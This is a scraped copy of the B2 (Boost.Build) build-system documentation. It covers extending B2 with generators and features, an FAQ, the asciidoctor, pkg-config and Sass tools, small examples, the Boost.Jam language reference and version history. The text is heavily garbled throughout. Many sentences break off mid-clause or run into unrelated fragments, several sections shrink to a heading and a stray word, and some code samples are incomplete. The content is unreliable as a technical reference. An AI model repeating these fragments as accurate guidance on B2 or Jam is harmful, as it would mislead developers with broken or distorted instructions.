can generate additional meta-information for the plugin. In either way, the PLUGIN type can be used whenever SHARED_LIB can. For example, you can directly link plugins to an application. 8.4. Scanners Sometimes, a file can refer to other files via some include system. To make B2. 8.5. Tools and generators This section will describe how B2 can be extended to support new tools. For each additional tool, a B2 object called generator must be created. That object has specific types of targets that it accepts and produces. Using that information, B2 is able to automatically invoke the generator. For example, if you declare a generator that takes a target of the type D and produces a target of the type OBJ, when placing a file with extension .d in a list of sources will cause B22, dependency scanning for C files, and the seconds handles various complexities like searched libraries. For that reason, you should always use those functions when adding support for compilers and linkers. (Need a note about UNIX) Custom generator classes behavior overridden. 8.6. Features, B2 Can I get capture external program output using a Boost.Jam variable? for an example of very smart usage of that feature). Of course one should always strive to use portable features, but these are still be provided as a backdoor just to make sure B2 does not take away any control from the user. Using portable features is a good idea because: When a portable feature is given a fixed set of values, you can build your project with two different settings of the feature and B2 will automatically use two different directories for generated files. B2 does not try to separate targets built with different raw options. Unlike with “raw” features, you don’t need to use specific command-line flags in your Jamfile, and it will be more likely to work with other tools. Steps for adding a feature Adding a feature requires three steps: Declaring a feature. For that, the "feature.feature" rule is used. You have to decide on the set of feature attributes: if you want a feature value set for one target to automatically propagate to its dependent targets then make it “propagated”. if a feature does not have a fixed list of values, it must be “free.” For example, the includefeature is a free feature. if a feature is used to refer to a path relative to the Jamfile, it must be a “path” feature. Such features will also get their values automatically converted to B2’s internal path representation. For example, includeis a path feature. if feature is used to refer to some target, it must be a “dependency” feature. Representing the feature value in a target-specific variable. Build actions are command templates modified by Boost.Jam variable expansions. The toolset.flagsrule sets a target-specific variable to the value of a feature. Using the variable. The variable set in step 2 can be used in a build action to form command parameters or files. Another examplepart. It tells B2 to translate the internal target name in DEF_FILEto a corresponding filename in the linkaction. Without it the expansion of $(DEF_FILE)would be a strange symbol that is not likely to make sense for the linker. We are almost done, except for adding the following code to msvc.jam: rule link { DEPENDS $(<) : [ on $(<) return $(DEF_FILE) ] ; } This is a workaround for a bug in B2 engine, which will hopefully be fixed one day. Variants and composite features.. 8.7. Main target rules, B2 automatically defines a corresponding rule. The name of the rule is obtained from the name of the type, by down-casing. 8.8. Toolset modules B2 more consistent: The initrule initializedmustmodule. You can take a look at how tools/gcc.jamuses that module in the initrule. 9. Frequently Asked Questions 9.1. How do I get the current value of feature in Jamfile? This is not possible, since Jamfile does not have "current" value of any feature, be it toolset, build variant or anything else. For a single run of B2,: Use conditional requirements or indirect conditional requirements. See the section called “Requirements”. Define a custom generator and a custom main target type. The custom generator can do arbitrary processing or properties. See the extender manual 9.2. I am getting a "Duplicate name of actual target" error. What does that mean? B2property not to affect how any other sources added for the built aand bexecutables would be compiled: obj a-obj : a.cpp : <include>/usr/local/include ; exe a : a-obj ; exe b : a-obj ; Note that in both of these cases the includeproperty will be applied only for building these object files and not any other sources that might be added for targets aand b. To compile the file twice, you can tell B2 B2 to actually change the generated object file names a bit for you and thus avoid any conflicts. Note that in both of these cases the includeproperty will be applied only for building these object files and not any other sources that might be added for targets aand b. A good question is why B2. 9.3. Accessing environment variables) ; 9.4. How to control properties order? For internal reasons, B2. 9.5. How to control the library linking order on Unix? On Unix-like operating systems, the order in which static libraries are specified when invoking the linker is important, because by default, the linker uses one pass though the libraries list. Passing the libraries in the incorrect order will lead to a link error. Further, this behavior is often used to make one library override symbols from another. So, sometimes it is necessary to force specific library linking order. B2 ; 9.6. Can I get capture external program output using a Boost.Jam variable? The SHELL builtin rule may be used for this purpose: local gtk_includes = [ SHELL "gtk-config --cflags" ] ; 9.7. How to get the project root (a.k.a. Jamroot) location? You might want to use your project’s root location in your Jamfiles. To access it just declare a path constant in your Jamroot.jam file using: path-constant TOP : . ; After that, the TOP variable can be used in every Jamfile. 9.8. How to change compilation flags for one file? ; 9.9. Why are the dll-path and hardcode-dll-paths properties useful?. 9.10. Targets in site-config.jam B2. 9.11. Header-only libraries B2 a header-only library can be declared as B2 target and all dependents can use such library without having to rememberents build properties. The dependents need not care if my-lib is a header-only or not, and it is possible to later make my-lib into a regular compiled library without having to add the includes to its dependents declarations. If you already have proper usage requirements declared for a project where a header-only library is defined, you do not need to duplicate them for the alias target: project my : usage-requirements <include>whatever ; alias mylib ; 9.12. What is the difference between B2, b2, bjam and Perforce Jam? B2 is the name of the complete build system. The executable that runs it is b2. That executable is written in C and implements performance-critical algorithms, like traversal of dependency graph and executing commands. It also implements an interpreted language used to implement the rest of B2. This executable is formally called "B2 engine". The B2 engine is derived from an earlier build tool called Perforce Jam. Originally, there were just minor changes, and the filename was bjam. Later on, with more and more changes, the similarity of names became. 10. Extra Tools 10.1. Documentation Tools 10.1.1. Asciidoctor The asciidoctor tool converts the ascidoc documentation format to various backend formats for either viewing or further processing by documentation tools. This tool supports the baseline asciidoctor distribution (i.e. the Ruby based tool). Feature: asciidoctor-attribute Defines arbitrary asciidoctor attributes. The value of the feature should be specified with the CLI syntax for attributes. For example to use as a target requirement: html example : example.adoc : <asciidoctor-attribute>idprefix=ex ; This is a free feature and is not propagated. I.e. it applies only to the target it’s specified on. Feature: asciidoctor-doctype Specifies the doctype to use for generating the output format. Allowed doctype values are: article, book, manpage, and inline. Feature: asciidoctor-backend Specifies the backend to use to produce output from the source asciidoc. This feature is automatically applied to fit the build target type. For example, when specifying an html target for an asciidoc source: html example : example.adoc ; The target will by default acquire the <asciidoctor-backend>html5 requirement. The default for each target type are: html: <asciidoctor-backend>html5 docbook: <asciidoctor-backend>docbook45 man: <asciidoctor-backend>manpage <asciidoctor-backend>pdf To override the defaults you specify it as a requirement on the target: docbook example : example.adoc : <asciidoctor-backend>docbook5 ; Allowed backend values are: html5, docbook45, docbook5, Initialization To use the asciidoctor tool you need to declare it in a configuration file with the using rule. The initialization takes the following arguments: command: The command, with any extra arguments, to execute. For example you could insert the following in your user-config.jam: using asciidoctor : "/usr/local/bin/asciidoctor" ; If no command is given it defaults to just asciidoctor with assumption that the asciidoctor is available in the search PATH. 10.2. Miscellaneous Tools 10.2.1. pkg-config The pkg-config program is used to retrieve information about installed libraries in the system. It retrieves information about packages from special metadata files. These files are named after the package, and have a .pc extension. The package name specified to pkg-config is defined to be the name of the metadata file, minus the .pc extension. Feature: pkg-config Selects one of the initialized pkg-config configurations. This feature is propagated to dependencies. Its use is dicussed in section Initialization. Feature: pkg-config-define This free feature adds a variable assignment to pkg-config invocation. For example, pkg-config.import mypackage : requirements <pkg-config-define>key=value ; is equivalent to invoking on the comand line pkg-config --define-variable=key=value mypackage ; Rule: import Main target rule that imports a pkg-config package. When its consumer targets are built, pkg-config command will be invoked with arguments that depend on current property set. The features that have an effect are: <pkg-config-define>: adds a --define-variableargument; <link>: adds --staticargument when <link>static; <link>: adds --staticargument when <link>static; <name>: specifies package name (target name is used instead if the property is not present); <version>: specifies package version range, can be used multiple times and should be a dot-separated sequence of numbers optionally prefixed with Example: pkg-config.import my-package : requirements <name>my_package <version><4 <version>>=3.1 ; Initialization To use the pkg-config tool you need to declare it in a configuration file with the using rule: using pkg-config : [config] : [command] ... : [ options ] ... ; config: the name of initialized configuration. The name can be omitted, in which case the configuration will become the default one. command: the command, with any extra arguments, to execute. If no command is given, first PKG_CONFIGenvironment variable is checked, and if its empty the string pkg-configis used. options: options that modify pkg-configbehavior. Allowed options are: <path>: sets PKG_CONFIG_PATHenvironment variable; multiple occurences are allowed. <libdir>: sets PKG_CONFIG_LIBDIRenvironment variable; multiple occurences are allowed. <allow-system-cflags>: sets PKG_CONFIG_ALLOW_SYSTEM_CFLAGSenvironment variable; multiple occurences are allowed. <allow-system-libs>: sets PKG_CONFIG_ALLOW_SYSTEM_LIBSenvironment variable; multiple occurences are allowed. <sysroot>: sets PKG_CONFIG_SYSROOT_DIRenvironment variable; multiple occurences are allowed. <variable>: adds a variable definition argument to command invocation; multiple occurences are allowed. Class pkg-config-target class pkg-config-target : alias-target-class { rule construct ( name : sources * : property-set ) rule version ( property-set ) rule variable ( name : property-set ) } The class of objects returned by import rule. The objects themselves could be useful in situations that require more complicated logic for consuming a package. See Tips for examples. rule construct ( name : sources * : property-set )Overrides alias-target.construct. rule version ( property-set )Returns the package’s version, in the context of property-set. rule variable ( name : property-set )Returns the value of variable namein the package, in the context of property-set. Tips Using several configurations Suppose, you have 2 collections of .pc files: one for platform A, and another for platform B. You can initialize 2 configurations of pkg-config tool each corresponding to specific collection: using pkg-config : A : : <libdir>path/to/collection/A ; using pkg-config : B : : <libdir>path/to/collection/B ; Then, you can specify that builds for platform A should use configuration A, while builds for B should use configuration B: project : requirements <target-os>A-os,<architecture>A-arch:<pkg-config>A <target-os>B-os,<architecture>B-arch:<pkg-config>B ; Thanks to the fact, that project-config, user-config and site-config modules are parents of jamroot module, you can put it in any of those files.o Choosing the package name based on the property set Since a file for a package should be named after the package suffixed with .pc, some projects came up with naming schemes in order to allow simultaneous installation of several major versions or build variants. In order to pick the specific name corresponding to the build request you can use <conditional> property in requirements: pkg-config.import mypackage : requirements <conditional>@infer-name ; rule infer-name ( properties * ) { local name = mypackage ; local variant = [ property.select <variant> : $(properties) ] ; if $(variant) = debug { name += -d ; } return <name>$(name) ; } The common.format-name rule can be very useful in this situation. Modify usage requirements based on package version or variable Sometimes you need to apply some logic based on package’s version or a variable that it defines. For that you can use <conditional> property in usage requirements: mypackage = [ pkg-config.import mypackage : usage-requirements <conditional>@define_ns ] ; rule extra-props ( properties * ) { local ps = [ property-set.create $(properties) ] ; local prefix = [ $(mypackage).variable name_prefix : $(ps) ] ; prefix += [ $(mypackage).version $(ps) ] ; return <define>$(prefix:J=_) ; } 10.2.2. Sass This tool converts SASS and SCSS files into CSS. This tool explicitly supports both the version written in C (sassc) and the original Ruby implementation (scss) but other variants might also work. In addition to tool-specific features, described in this section, the tool recognizes features <flags> and <include>. Feature: sass-style Sets the output style. Available values are nested: each property is put on its own line, rules are indented based on how deeply they are nested; expanded: each property is put on its own line, rules are not indented; compact: each rule is put on a single line, nested rules occupy adjacent lines, while groups of unrelated rules are separated by newlines; compressed: takes minimum amount of space: all unnecessary whitespace is removed, property values are compressed to have minimal representation. The feature is optional and is not propagated to dependent targets. If no style is specified, then, if property set contains property <optimization>on, compressed style is selected. Otherwise, nested style is selected. Feature: sass-line-numbers Enables emitting comments showing original line numbers for rules. This can be useful for debugging a stylesheet. Available values are on and off. The feature is optional and is not propagated to dependent targets. If no value for this feature is specified, then one is copied from the feature debug-symbols. Initialization To use the sass tool you need to declare it in a configuration file with the using rule. The initialization takes the following arguments: command: the command, with any extra arguments, to execute. For example you could insert the following in your user-config.jam: using sass : /usr/local/bin/psass -p2 ; # Perl libsass-based version If no command is given, sassc is tried, after which scss is tried. 11. Examples 11.1. Introduction Here we include a collection of simple to complex fully working examples of using Boost Build v2 for various tasks. They show the gamut from simple to advanced features. If you find yourself looking at the examples and not finding something you want to see working please post to our support list and we’ll try and come up with a solution and add it here for others to learn from. 11.2. Hello This example shows a very basic Boost Build project set up so it compiles a single executable from a single source file: hello.cpp #include <iostream> int main() { std::cout << "Hello!\n"; } Our jamroot.jam is minimal and only specifies one exe target for the program: jamroot.jam exe hello : hello.cpp ; Building the example yields: > cd /example/hello > b2 ...found 8 targets... ...updating 4 targets... common.mkdir bin/clang-darwin-4.2.1 common.mkdir bin/clang-darwin-4.2.1/debug clang-darwin.compile.c++ bin/clang-darwin-4.2.1/debug/hello.o clang-darwin.link bin/clang-darwin-4.2.1/debug/hello ...updated 4 targets... > bin/clang-darwin-4.2.1/debug/hello Hello! 11.3. Sanitizers This example shows how to enable sanitizers when using a clang or gcc toolset main.cpp int main() { char* c = nullptr; std::cout << "Hello sanitizers\n " << *c; } Our jamroot.jam is minimal and only specifies one exe target for the program: jamroot.jam exe main : main.cpp ; Sanitizers can be enabled by passing on or norecover to the appropriate sanitizer feature (e.g. thread-sanitizer=on). The norecover option causes the program to terminate after the first sanitizer issue is detected. The following example shows how to enable address and undefined sanitizers in a simple program: > cd /example/sanitizers > b2 toolset=gcc address-sanitizer=norecover undefined-sanitizer=on ...found 10 targets... ...updating 7 targets... gcc.compile.c++ bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main.o gcc.link bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main ...updated 7 targets... Running the produced program may produce an output simillar to the following: > ./bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main Hello sanitizers main.cpp:6:43: runtime error: load of null pointer of type 'char' ASAN:DEADLYSIGNAL ================================================================= ==29767==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55ba7988af1b bp 0x7ffdf3d76560 sp 0x7ffdf3d76530 T0) ==29767==The signal is caused by a READ memory access. ==29767==Hint: address points to the zero page. #0 0x55ba7988af1a in main /home/damian/projects/boost/tools/build/example/sanitizers/main.cpp:6 #1 0x7f42f2ba1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #2 0x55ba7988adb9 in _start (/home/damian/projects/boost/tools/build/example/sanitizers/bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main+0xdb9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/damian/projects/boost/tools/build/example/sanitizers/main.cpp:6 in main ==29767==ABORTING 12. Boost.Jam Documentation Jam is a make(1) replacement that makes building simple things simple and building complicated things manageable. 12.1. Building B2 Installing B2 after building it is simply a matter of copying the generated executables someplace in your PATH. For building the executables there are a set of build bootstrap scripts to accommodate particular environments. The scripts take one optional argument, the name of the toolset to build with. When the toolset is not given an attempt is made to detect an available toolset and use that. The build scripts accept these arguments:/src/engine. the src/engine directory. The build.sh script supports additional invocation options used to control the the build and custom compilers: build.sh [--option|--option=x] [toolset] Shows some help information, including these options. --verbose Show messages about what this script is doing. --debug Builds debugging versions of the executable. The default is to build an optimized executable. --guess-toolset Print the toolset we can detect for building. This is used by external scripts, like the Boost Libraries main bootstrap script. --cxx=CXX The compiler exec to use instead of the detected compiler exec. --cxxflags=CXXFLAGS The compiler flags to use in addition to the flags for the detected compiler. 12.2. Language B2 has an interpreted, procedural language. Statements in b2 are rule (procedure) definitions, rule invocations, flow-of-control structures, variable assignments, and sundry language support. 12.2.1. Lexical Features |#. 12.2.2. Targets The essential b2 data entity is a target. Build targets are files to be updated. Source targets are the files used in updating built targets. Built targets and source targets are collectively referred to as file targets, and frequently built targets are source targets for other built targets. Pseudo-targets). Binding Detection. 12.2.3. Rules). $(1) and $(2). $(<)and $(>)are synonymous. Action Modifiers The following action modifiers are understood: actions bind vars $(vars)will be replaced with bound values. actions existing actions ignore The return status of the commands is ignored. actions piecemeal commands are repeatedly invoked with a subset of actions quietly The action is not echoed to the standard output. actions together The actions updated Argument lists. 12.2.4. Built-in Rules B2 has a growing set of built-in rules, all of which are pure procedure rules without updating actions. They are in three groups: the first builds the dependency graph; the second modifies it; and the third are just utility rules. Dependency Building DEPENDS rule DEPENDS ( targets1 * : targets2 * ) Builds a direct dependency: makes each of targets1 depend on each of targets2. Generally, targets1 will be rebuilt if targets2 are themselves rebuilt or are newer than targets1. INCLUDES. Modifying Binding: ALWAYS. NOTFILE rule NOTFILE ( targets * ) Marks targets as pseudo-targets and not real files. No timestamp is checked, and so the actions on such a target are only executed if the target’s dependencies are updated, or if the target is also marked with ALWAYS. The default b2 target all is a pseudo-target In Jambase, NOTFILE is used to define several addition convenient pseudo-targets NOUPDATE. TEMPORARY. FAIL_EXPECTED. RMOLD. ISFILE. Utility The two rules ECHO and EXIT are utility rules, used only in `b2`s parsing phase. EXIT. GLOB The GLOB rule does filename globing-cased before matching. GLOB_ARCHIVE The GLOB_ARCHIVE rule does name globing-c. MATCH The MATCH rule does pattern matching. rule MATCH ( regexps + : list * ) Matches the egrep(1) style regular expressions regexps against the strings in list. The result is a list of matching ()subexpressions for each string in list, and for each regular expression in regexps. BACKTRACE rule BACKTRACE ( ) Returns a list of quadruples: filename line module rulename…, describing each shallower level of the call stack. This rule can be used to generate useful diagnostic messages from Jam rules. UPDATE: It clears the list of targets to update, and Causes the specified targets to be updated. ; W32_GETREGMis equivalent to HKEY_LOCAL_MACHINE. HKCUis equivalent to HKEY_CURRENT_USER. HKCRis" ] ; W32_GETREGNAMES-keys) ; } } SHELL. SPLIT_BY_CHARACTERS rule SPLIT_BY_CHARACTERS ( string : delimiters ) SPLIT_BY_CHARACTERS splits the specified string on any delimiter character present in delimiters and returns the resulting list. PRECIOUS rule PRECIOUS ( targets * ) The PRECIOUS rule specifies that each of the targets passed as the arguments should not be removed even if the command updating that target fails. PAD rule PAD ( string : width ) If string is shorter than width characters, pads it with whitespace characters on the right, and returns the result. Otherwise, returns string unmodified. FILE_OPEN rule FILE_OPEN ( filename : mode ) The FILE_OPEN rule opens the specified file and returns a file descriptor. The mode parameter can be either "w" or "r". Note that at present, only the UPDATE_NOW rule can use the resulting file descriptor number. UPDATE_NOW. 12.2.5. Flow-of. 12.2.6. Variables). Variable Expansion — a basename without extension. :S Select file extension — a modifier, under Cygwin only, turns a cygwin path into a Win32 path using the cygwin_conv_to_win32_pathfunction. For example x = "/cygdrive/c/Program Files/Borland" ; ECHO $(x:W) ; prints C:\Program Files\Borlandon Cygwin Similarly, when used on OpenVMS, the :Wmodifier translates a POSIX-style path into native VMS-style format using decc$to_vmsCRTL function. This modifier is generally used inside action blocks to properly specify file paths in VMS-specific commands. For example x = "subdir/filename.c" ; ECHO $(x:W) ; prints [.subdir]filename.con OpenVMS On other platforms, the string is unchanged. :chars Select the components listed in chars. For example, :BSselects filename (basename and extension). atenate list elements into single element, separated by joinval. :O=value Sets semantic options for the evaluation of the variable. The format of the value is specific to either variable or generated file expansion. On VMS, $(var:P) is the parent directory of $(var:D). :⇐value After evaluating the expansion of the variable prefixes the given value to the elements of the expanded expression values. :>=value After evaluating the expansion of the variable postfixes the given value to the elements of the expanded expression values. Local For Loop Variables Boost Jam allows you to declare a local for loop control variable right in the loop: x = 1 2 3 ; y = 4 5 6 ; for local y in $(x) { ECHO $(y) ; # prints "1", "2", or "3" } ECHO $(y) ; # prints "4 5 6" Generated File Expansion. This expansion follows the same modifiers as variable expansion. The generated file expansion accepts these ( :O=) expansion option values: F Always replace the C Always replace the :E=valueexpression. FCor CF Replace with either the file or contents depending on the length of the contents ( :E=value). It will replace with the contents in an action if the length of the command is shorter than the allowed command length limit. Otherwise the reference is replaced with the filename. Built-in Variables This section discusses variables that have special meaning to b2. All of these must be defined or used in the global module — using those variables inside a named module will not have the desired effect. See Modules. SEARCH and LOCATE: If $(LOCATE)is set then the target is bound relative to the first directory in $(LOCATE). Only the first element is used for binding. If $(SEARCH)is set then the target is bound to the first directory in $(SEARCH)where the target file already exists. If the $). Semaphores It is sometimes desirable to disallow parallel execution of some actions. For example: Old versions of yacc use files with fixed names. So, running two yacc actions is dangerous. One might want to perform parallel compiling, but not do parallel linking, because linking is i/o bound and only gets slower.. Jam Version JAMDATE Time and date at b2start-up as an ISO-8601 UTC value. JAMUNAME Output of uname(1) command (Unix only) JAMVERSION b2version, as a sematic triplet "X.Y.Z". JAM_VERSION A predefined global variable with two elements indicates the version number of Boost Jam. Boost Jam versions start at 03 00. Earlier versions of Jamdo not automatically define JAM_VERSION. JAMSHELL -j flag given on the command line. Armed with this, it is possible to write a multiple host shell. For example: %to be the text of the rule’s action block, it expands a !to be the multi-process slot number. The slot number varies between 1 and the number of concurrent jobs permitted by the #! __TIMING_RULE__ and __ACTION_RULE__targetoption. 12.2.7. Modules. Declaration ; } } Variable Scope Rules local rule rulename... The rule is declared locally to the current module. It is not entered in the global module with qualification, and its name will not appear in the result of: [ RULENAMES module-name ] The RULENAMES Rule rule RULENAMES ( module ? ) Returns a list of the names of all non-local rules in the given module. If module is omitted, the names of all non-local rules in the global module are returned. The VARNAMES Rule rule VARNAMES ( module ? ) Returns a list of the names of all variable bindings in the given module. If module is omitted, the names of all variable bindings in the global module are returned. The IMPORT Rule ] ; The EXPORT Rule. The CALLER_MODULE Rule)} ; 12.3. Miscellaneous 12.3.1. Diagnostics In addition to generic error messages, b22 removed a partially built target after being interrupted. 12.3.2. Bugs, Limitations. 12.3.3. Fundamentals. Jam rulesare actually simple procedural entities. Think of them as functions. Arguments are separated by colons. A Jam target is an abstract entity identified by an arbitrary string. The built-in DEPENDSrule creates a link in the dependency graph between the named targets. Note that the original Jam documentation for the built-in. When a rule is invoked, if there are. Targets (other than. In addition to local and global variables, jam allows you to set a variable ona target. Target-specific variable values can usually not be read, and take effect only in the following contexts: In updating actions, variable values are first looked up onthe target named by the first argument (the target being updated). Because Jam builds its entire dependency tree before executing actions, Jam rules make target-specific variable settings as a way of supplying parameters to the corresponding actions. Binding is controlled entirely by the target-specific setting of the SEARCHand LOCATEvariables, as described here. In the special rule used for header file scanning, variable values are first looked up onthe target named by the rule’s first argument (the source file being scanned). The "bound value" of a variable is the path associated with the target named by the variable. In build actions, the first two arguments are automatically replaced with their bound values. Target-specific variables can be selectively replaced by their bound values using the bindaction modifier.". "Grist" is just a string prefix of the form <characters>. It is used in Jam to create unique target names based on simpler names. For example, the file name test.exemay be used by targets in separate sub-projects,: The location of targets cannot always be derived solely from what the user puts in a Jamfile, but sometimes depends also on the binding process. Some mechanism to distinctly identify targets with the same name is still needed. Grist allows us to use a uniform abstract identifier for each built target, regardless of target file location (as allowed by setting ALL_LOCATE_TARGET). When grist is extracted from a name with $(var:G), the result includes the leading and trailing angle brackets. When grist is added to a name with $(var:G=expr), existing grist is first stripped. Then, if expris non-empty, leading <s and trailing >s are added if necessary to form an expression of the form <expr2>; <expr2> is then prepended.. The parsing of command line options in Jam can be rather unintuitive, with regards to how other Unix programs accept options. There are two variants accepted as valid for an option: -xvalue, and -x value. 13. History 13.1. Version 4.7.2 Fix errors configuring intel-linux toolset if icpx is not in the PATH but icpc is in the PATH. — Mark E. Hamilton Add cxxstd=20to msvc toolset now that VS 2019 onward supports it. — Peter Dimov 13.3. Version 4.7.0 Many, many fixes and internal cleanups in this release. But also adding auto-detection and bootstrap for VS 2022 preview toolset. New: Add vc143, aka VS2022, aka cl.exe 17.x toolset support. Includes building engine and automatic detection of the prerelease toolset. — Sergei Krivonos Allow alias targets to continue even if <build>nois in the usage requirement. Which allows composition of alias targets that may contain optional targets, like tests. — Dmitry Arkhipov Fix use of JAMSHELLin gcc toolset. — René Ferdinand Rivera Morell Fix compiling b2 enging such that it works when run in cross-architecture emulation context. I.e. when running arm binaries in QEMU 64 bit host. — René Ferdinand Rivera Morell Default to 64bit MSVC on 64 bit hosts. — Matt Chambers Remove /NOENTRYoption for resource only DLLs to allow correct linking. — gnaggnoyil Fix redefinition error of unixwhen compiling engine on OpenBSD. — Brad Smith Fix building with clang on iOS and AppleTV having extra unrecognized compiler options. — Konstantin Ivlev Add missing Boost.JSON to boostsupport module. — Dmitry Arkhipov Add arm/arm64 target support in clang-win toolset. — Volo Zyko Avoid warnings about threading model for qt5. — psandana Unify Clang and GCC PCH creation. — Nikita Kniazev Move Objective-C support to GCC toolset. — Nikita Kniazev Support values for instruction-set feature for Xilinx ZYNQ. — Thomas Brown MIPS: add generic mips architecture. — YunQiang Su Fix preprocessing on MSVC compiler. — Nikita Kniazev 13.4. Version 4.6.1 Fix building b2 engine with cygwin64. — René Ferdinand Rivera Morell Fix version detection of clang toolset from compiler exec. — Nikita Kniazev 13.5. Version 4.6.0 This release wraps up a few new features that make using some toolsets easier (thanks to Nikita). It’s now also possible to specify empty flags features on the command line, like cxxfalgs=, and have those be ignored. This helps to make CI scripts shorter as they don’t need to handle those cases specially. And as usual there are many bug fixes and adjustments. Thanks to everyone who contributed to this release. New: Allow clang toolset to be auto-configured to a specific version by using toolset=clang-xxon the command line. — Nikita Kniazev New: Include pch header automatically and on-demand on gcc and msvc toolset to mirror clang functionality. — Nikita Kniazev New: Features that are narked as 'free' and 'optional' will now be ignored when the value specified on the command line is empty. Hence once can specify cxxflags=on the command line without errors. — René Ferdinand Rivera Morell Preserve bootstrap.shinvoke arguments to forward to the build.shscript. — tkoecker Remove use of localin buils.shto be compatible with some, not fully capable, shells. — Tanzinul Islam Workaround shell array ref error in build.shon busybox shells. — tkoecker Check for needing -pthreadto build engine with gcc on some platforms. — tkoecker Default to using clang on MacOS. — Stéphan Kochen Add /python//numpytarget to use as a dependency to communicate version specific properties. — Peter Dimov Add default value for cxx and cxxflags from env vars CXXand CXXFLAGSwhen using the custom cxxtoolset to build the engine. — Samuel Debionne and René Ferdinand Rivera Morell Fix detection of intel-linuxtoolset installation when only the compiler executable is in the PATH. — René Ferdinand Rivera Morell Fix b2executable path determination for platforms that don’t have a native method of getting the path to executables, like OpenBSD. — René Ferdinand Rivera Morell Fix property.finderror message. — Thomas Brown 13.6. Version 4.5.0 Some minor fixes to improve some old issues. Reenable ability of generators to return property-setas first item. — Andrew McCann Fix examples to return 0 on success. — Mateusz Łoskot Handle spaces in CXX path in config_toolset.bat. Fix Conan b2 generator link, and pkg-config doc build error. — René Ferdinand Rivera Morell 13.7. Version 4.4.2 This release is the first of the new home for B2 at Build Frameworks Group. Change references in documentation and sources of boost.org to point at equivalent bfgroup resources. — René Ferdinand Rivera Morell New theme for B2 site and documentation. — René Ferdinand Rivera Morell 13.8. Version 4.4.1 Minor patch to correct missing fix for macOS default engine compiler. Fix engine build defaulting to gcc instead of clang on macOS/Xcode. — René Ferdinand Rivera Morell 13.9. Version 4.4.0 Along with a variety of fixes this version introduces "dynamic" response file support for some toolsets. This means that under most circumstances, if supported by the toolset, response files are not generated. Instead the command is expanded to include the options directly. New: Add response-filefeature to control the kind of response file usage in toolset action. — René Ferdinand Rivera Morell New: Add :O=valuevariable modifier for New: Add :⇐valueand :>=valuevariable modifiers for prefix and postfix values after the complete expansion of variable references. — René Ferdinand Rivera Morell New: Implement PCH on clang-win and clang-darwin. — Nikita Kniazev New: Add support for Intel oneAPI release to intel-linux toolset. — René Ferdinand Rivera Morell New: Add support for Intel oneAPI release to intel-windows toolset. — Edward Diener Remove one at time linking limit. Once upon a time this was a performance tweak as hardware and software was not up to doing multiple links at once. Common setups are better equipped. — René Ferdinand Rivera Morell Fix building engine with GCC on AIX. — René Ferdinand Rivera Morell Support building engine as either 32 or 64 bit addressing model. — René Ferdinand Rivera Morell Basic support for building b2 engine on GNU/Hurd. — Pino Toscano Update "borland" toolset to bcc32c for building B2. — Tanzinul Islam Ensure Embarcadero toolset name is only "embtc". — Tanzinul Islam Adapt for Emscripten 2.0 change of default behavior for archives. — Basil Fierz Fix path to bootstrap for back compat. — René Ferdinand Rivera Morell Add missing BOOST_ROOT to boot strap search. — René Ferdinand Rivera Morell Fix for engine compile on FreeBSD. — René Ferdinand Rivera Morell Default MSVC to a native platform, and remove ambiguous implicit address-model ARM/ARM64 values. — Nikita Kniazev Fix detection of MIPS32 for b2 engine build. — Ivan Melnikov Enable building b2 engine with clang on Windows. — Gei0r Fix building b2 engine with Intel Linux icpc. — Alain Miniussi Rework build.shto fix many bugs and to avoid use of common env vars. — René Ferdinand Rivera Morell Remove limitation of relevant features for configure checks. — René Ferdinand Rivera Morell Reformat configure check output to inform the variants of the checks in a reasonably brief form. — René Ferdinand Rivera Morell Support building engine on Windows Bash with Mingw. — René Ferdinand Rivera Morell 13.10. Version 4.3.0 There are many invidual fixes in this release. Many thanks for the contributions. Special thanks to Nikita for the many improvements to msvc and general plugging of support holes in all the compilers. There are some notable new features from Dmitry, Edward, and Nkita: New: Add force-includefeature to include headers before all sources. — Nikita Kniazev New: Partial support for Embarcadero C++ compilers based on clang-5. — Edward Diener New: Implement configurable installation prefixes that use features. — Dmitry Arkhipov New: Add translate-pathfeature. The translate-path feature allows for custom path handling, with a provided rule, on a per target basis. This can be used to support custom path syntax. — René Ferdinand Rivera Morell New: Add portable B2 system install option. This allows the b2 executable and the build system files to live side by side. And hence to be (re)located anywhere on disk. Soon to be used to supports Windows and other installers. This removes the need for the boost-build.jamfile for bootstrap. Making it easier for users to get started. — René Ferdinand Rivera Morell Unbreak building from VS Preview command prompt. — Marcel Raad Fix compiler version check on macOS darwin toolset. — Bo Anderson Remove pch target naming restriction on GCC. — Nikita Kniazev Select appropriate QNX target platform. — Alexander Karzhenkov Various space & performance improvements to the b2 engine build on Windows. — Nikita Kniazev Fill extra and pedantic warning options for every compiler. — Nikita Kniazev Include OS error reason for engine IO failures. — Nikita Kniazev Use /Zc:inline and /Zc:throwingNew flags for better language conformance. — Nikita Kniazev Add cxxstd value 20 for C++20. — Andrey Semashev Parallel B2 engine compilation on MSVC. — Nikita Kniazev Updated instruction-set feature with new x86 targets. — Andrey Semashev Pass /nologo to rc on Windows compilers. — Nikita Kniazev Fixed negation in conditional properties. — Nikita Kniazev Remove leftover manifest generation early exiting. — Nikita Kniazev Fix timestamp delta calculation. — Nikita Kniazev Add missing assembler options to clang-win.jam, to enable Context to build. — Peter Dimov Updated scarce :charsdocumentation with :BSexample. — Nikita Kniazev Fix link statically against boost-python on linux. — Joris Carrier Ongoing cleanup of engine build warnings. — René Ferdinand Rivera Morell Allow self-testing of toolsets that use response files. — René Ferdinand Rivera Morell Port Jambaseto native C++. Hence removing one of the oldest parts of the original Jam bootstrap process. — René Ferdinand Rivera Morell 13.11. Version 4.2.0 This release is predominantly minor fixes and cleanup of the engine. In particular the bootstrap/build process now clearly communicates C++11 requirement. Add saxonhe_diraction. — Richard Hodges Add CI testing for historical Boost versions on Windows MSVC. — René Ferdinand Rivera Morell Check for C++11 support when building engine. Including an informative error message as to that fact. — René Ferdinand Rivera Morell Update Jam grammar parser with latest bisonversion. — René Ferdinand Rivera Morell Allow root b2 b2engine build to work even if bisongrammar generator is not available. — René Ferdinand Rivera Morell Warning free engine build on at least Windows, macOS, and Linux. — René Ferdinand Rivera Morell Sanitize Windows 